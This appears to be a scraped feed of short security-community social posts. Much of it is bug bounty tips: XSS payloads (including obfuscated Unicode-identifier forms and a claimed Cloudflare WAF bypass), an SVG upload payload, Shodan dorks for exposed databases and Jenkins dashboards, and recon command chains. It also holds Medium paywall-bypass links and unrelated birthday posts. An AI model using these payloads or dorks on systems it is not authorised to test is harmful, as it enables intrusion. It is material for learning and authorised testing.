Cloud security is one of the hottest topics to master in 2024. As a bug bounty hunter, you can help companies secure cloud environments, like AWs, by reporting vulnerabilities for $$$$ How can I? Use S3Scanner. How to use? Follow this thread.

🖼️ Bypass Medium Paywall A little lifehack if you, like me, come across paid articles from Medium. These sites allow you to read paid Medium articles for free: 🔗 freedium.cfd<URL> 🔗 medium-forall.vercel.app #medium #premium #bypass Cyber Detective💙💛

⚙ Dorky Came across a recon tool I made a few years back for generating Google dorks, and automatically open the dorks in new tabs. dork.bugbountyhunting.com 1/n #infosec #cybersecurity #bugbountytips #bugbounty

Hey Hackers! 👋 I'm sharing awesome cyber-security resources that I found on the Internet. Bookmark & Share 🧵⤵️ #Hacking #infosecurity #infosec #Pentesting #redteam #pwn #CyberSecurity #CTF #CyberSecurity #cybersecuritytips #CyberSecurityAwareness •Awesome Red Team Ops :-

Top 3 RXSS payloads I use: `'";//><img/src=x onError="${x};alert(`1`);"> `'";//><Img Src=a OnError=location=src> `'";//></h1><Svg+Only%3d1+OnLoad%3dconfirm(atob("WW91IGhhdmUgYmVlbiBoYWNrZWQgYnkgb3R0ZXJseSE%3d"))> #bugbounty #xss #bugbountytips

I ❤️ DNS I’ve spent 2 years full-time building nslookup.io. Now, I’m teaching everything I know in this course.

🚀🚀Shodan-Dork🚀🚀 🔍 Prodect mysql found 👉product:MySQL 🔍 MongoDB 👉"MongoDB Server Information" -authentication 🔍 defult password 👉"default password" 🔍 guest login 👉 guest login ok 🔍 Jenkins Unrestricted Dashboard 👉x-jenkins 200 🔍 wp config 👉http.html:"* The

Pentester Special Dictionary:- Dictionary for penetration testers happy hacker 🎉 github.com/a3vilc0de/Pent…

SVG File upload payload by Stealthy <svg> <foreignObject width="100%" height="100%"> <body> <iframe src='javascript:confirm(10)'></iframe> </body> </foreignObject> </svg> x.com/stealthybugs/s…

🔍 #Recon automation for #bughunters 1- Subdomain discovery with Subfinder: ``` subfinder -dL targets.txt -all -recursive -o facebook.txt cat facebook.txt | wc -l ``` 2- Discover subdomains via crt.sh: ``` curl -s

XSS Tip: If alert() is being converted to ALERT() and you can use Like onerror=" 𐂃='',𐃨=!𐂃+𐂃,𐂝=!𐃨+𐂃,𐃌=𐂃+{},𐁉=𐃨[𐂃++],𐃵=𐃨[𐂓=𐂃],𐀜=++𐂓+𐂃,𐂠=𐃌[𐂓+𐀜],𐃨[𐂠+=𐃌[𐂃]+(𐃨.𐂝+𐃌)[𐂃]+𐂝[𐀜]+𐁉+𐃵+𐃨[𐂓]+𐂠+𐁉+𐃌[𐂃]+𐃵][𐂠](𐂝[𐂃]+𐂝[𐂓]+𐃨[𐀜]+𐃵+𐁉+'(𐂃)')()" #xss

📢a XSS payload, Cuneiform-alphabet based ! 𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++], 𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀] +(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀] +𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")() #bugbounty #bugbountytips

Easy P2,p3 bug methodology to find sqli, xss and injection attacks 1. waybackurls target.com | grep = | tee param.txt git clone = github.com/projectdiscove… 2. cat param.txt | nuclei -t fuzzing-templates By:xit! 🇮🇳 credit: RootMoksha Labs #bugbountytips

Arjun + KXSS Finding - Parameter - XSS arjun -q -u target -oT arjun && cat arjun | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' | kxss By:Gudetama credit: RootMoksha Labs #bugbountytips #bugbounty

Discovered a new xss payload that bypasses cloudflare web application firewall!! Payload: <button%20popovertarget=x>Click%20me</button><img%20onbeforetoggle=alert(1)%20popover%20id=x>XSS #cybersecurity #ethicalhacking #bugbounty #bugbountytips #penetrationtesting

Happy Birthday to our star volunteer Devu🇮🇳 🎂🎉

Yuva Dilo❤️ ki Dhadakan, Dil tute khatarnak Jahreele Shayar, Indoor Sahar ki aan baan saan, Seasides ke sabse Lokpriya Sadasya, Hamare Honey Bunny🤣🤣, Yuva Hacker: Bhai Vedant Jain Ji ko Happy Wala Bday.🥳🥳🥳

Happy Birthday Chief Meme Officer Seasides Shri Shri 1008 Pt. Anurag Mishra🇮🇳 ji Maharaj . Song_Credit : Dhinchak_Pooja🥳

Kartheek Lade Kartheek Lade's journey has been nothing short of inspiring. From his impactful contributions to the Seasides Conference to his stellar professional achievements, he has consistently showcased dedication, passion, and excellence. youtu.be/mCMGHQVv8Cc

DevSecOps: Free Learning Resources 1. OWASP DevSecOps Guide owasp.org/www-project-de… 2. DevSecOps - Introduction (Microsoft Learn) learn.microsoft.com/en-us/training… 3. DevSecOps Essentials (EDX - LinuxFoundationX) edx.org/learn/devsecops 4. DevSecOps Bootcamp (Practical DevSecOps)